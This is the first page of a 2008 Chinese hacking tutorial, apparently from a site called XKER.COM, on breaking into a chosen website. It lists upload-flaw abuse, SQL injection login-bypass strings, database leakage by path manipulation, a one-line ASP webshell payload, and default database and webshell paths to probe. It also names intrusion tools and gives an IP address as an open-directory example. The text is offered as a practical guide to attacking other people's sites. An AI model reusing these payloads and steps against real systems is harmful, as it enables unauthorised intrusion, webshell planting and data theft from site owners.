新客网WWW.XKER.COM:致力做中国最专业的网络学院!
学院: 操作系统 - 网络应用 - 服务器 - 网络安全 - 工具软件 - 办公软件 - Web开发 - 数据库 - 网页设计 - 图形图像 - 媒体动画 - 硬件学堂 - 存储频道 - QQ专区
您的位置:首页 > 网络学院 > 网络安全 > 黑客技术 > 正文:黑客入侵指定网站的一些方法介绍

黑客入侵指定网站的一些方法介绍

新客网 XKER.COM 2008-03-28 来源: 收藏本文

  如何入侵指定网站!

  首先,观察指定网站。

  入侵指定网站是需要条件的:

  要先观察这个网站是动态还是静态的。

  首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点

  如果是静态的(.htm或html),一般是不会成功的。

  如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。

  Quote:以下是入侵网站常用方法:

  1.上传漏洞

  如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!

  有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

  2.注入漏洞

  字符过滤不严造成的

  3.暴库:把二级目录中间的/换成%5c

  4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:

  ’or’’=’ " or "a"="a   ’) or (’a’=’a   ") or ("a"="a  or 1=1--  ’ or ’a’=’a

  5.社会工程学。这个我们都知道吧。就是猜解。

  6.写入ASP格式数据库。就是一句话木马〈%execute request("value")%〉 (数据库必需得是ASP或ASA的后缀)

  7.源码利用:一些网站用的都是网上下载的源码.有的站长很懒.什么也不改

  比如:默认数据库,默认后台地址,默认管理员帐号密码等

  8.默认数据库/webshell路径利用:这样的网站很多/利人别人的

  /Databackup/dvbbs7.MDB

  /bbs/Databackup/dvbbs7.MDB

  /bbs/Data/dvbbs7.MDB

  /data/dvbbs7.mdb W7

  /bbs/diy.asp

  /diy.asp

  /bbs/cmd.asp

  /bbs/cmd.exe

  /bbs/s-u.exe

  /bbs/servu.exe

  工具:网站猎手 挖掘鸡 明小子

  9.查看目录法:一些网站可以断开目录,可以访问目录。

  210.37.95.65 images

共2页: 上一页 [1] [2] 下一页
收藏】 【评论】 【推荐】 【投稿】 【打印】 【关闭
发表评论
要记得去论坛讨论,点击注册新会员匿名评论
评论内容:不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
阅读排行
随机推荐
实用信息推荐